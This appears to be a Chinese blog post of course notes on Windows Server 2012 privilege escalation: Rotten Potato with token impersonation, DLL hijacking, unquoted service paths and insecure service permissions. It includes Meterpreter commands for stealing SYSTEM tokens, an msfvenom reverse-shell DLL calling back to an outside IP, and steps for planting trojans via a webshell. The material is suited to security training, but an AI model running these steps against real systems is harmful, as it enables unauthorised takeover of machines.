权限提升-烂土豆&dll劫持&引号路径&服务权限

发布时间 2023-09-14 15:16:59作者: 执小汐

必备知识点:

#令牌窃取配合烂土豆提权

单纯令牌窃取:web权限或本地提权

如配合烂土豆提权:web或数据库等权限

 

#不带引号服务路径安全问题

服务路径提权:web权限或本地提权

 

#不安全的服务权限配置问题

服务权限配置:WEB权限或本地提权(web几率小)

 

#补充说明:dll劫持提权及AlwaysInstallElevated等说明

dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋

AlwaysInstallElevated提权默认禁用配置,利用成功机会很少

 

演示案例:

Win2012-烂土豆配合令牌窃取提权-Web权限

如果单单用令牌窃取,权限太低,无法窃取。例如,如果是web权限(IIS类似的服务权限)

原理:参考上述图片内容,非服务类用户权限无法窃取成功(原理)

过程:上传烂土豆-执行烂土豆-利用窃取模块-窃取SYSTEM-成功


upload /root/potato.exe C:\Users\Public
cd C:\\Users\\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

通过webshell上传木⻢,并且执行

执行之前先在msf上开启监听

 

执行之后在msf看到会话

上传烂土豆并且执行(执行并非在webshell上执行,而是在MSF上执行)

 

在msf中没有在C盘列表中看到potato.exe文件,但通过webshell我们可以知道我们已经上传了,在C盘根目录之后再使用令牌窃取

Win2012-DLL劫持提权应用配合MSF-web权限

原理:Windows程序启动的时候需要DLL,如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预先定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1.应用程序加载的目录

2.C:\Windows\system32

3.C:\Windows\system

4.C:\windows

5.当前工作目录Current Working Directory,CWD

6.在PATH环境变量的目录(先系统后用户)

 

过程:信息收集(搜集服务器上其他的第三方应用)-进程调试(分析这个程序启动时调用那些dll)-制作dll并上传-替换dll-启动应用后成功

msfvenom -p windows/meterpreter/reverse_tcp

lhost=101.37.169.46 lport=6677 -f ddl >/opt/xiaodi.dll

收集信息

发现一个flashfxp第三方软件

进程调试

在网上下载flashfxp软件

用火绒剑来调试软件

寻找非系统文件

生成dll

使用MSF生产dll,使用上述命令

替换dll,MSF监听,当软件执行时调用dll,反弹成功

然后再使用令牌窃取提权至system

满足条件:

y有第三方软件

能够替换dll

管理员要去运行这个程序

win2012-不安全的服务权限配合MSF-本地权限

监听,获得会话,直接获得SYstem权限

win2012-不带引号服务路径配合MSF-web,本地提权

该命令显示这两个地方可以操作。有安全问题的必须时目录里面带空格的

当这样执行时,系统会把C:\Program空格后面的当作参数

我们可以把一个cmd名字改为Program,这样就能运行了

上传名字为Program的木⻢,用本地启用,启动端口监听,获得了会话

关于Windows相关知识点总结说明-权限层,系统层,防护层等

掌握:提权方法对应层面,提权方法对应系统版本,相关文件及后⻔免杀问题等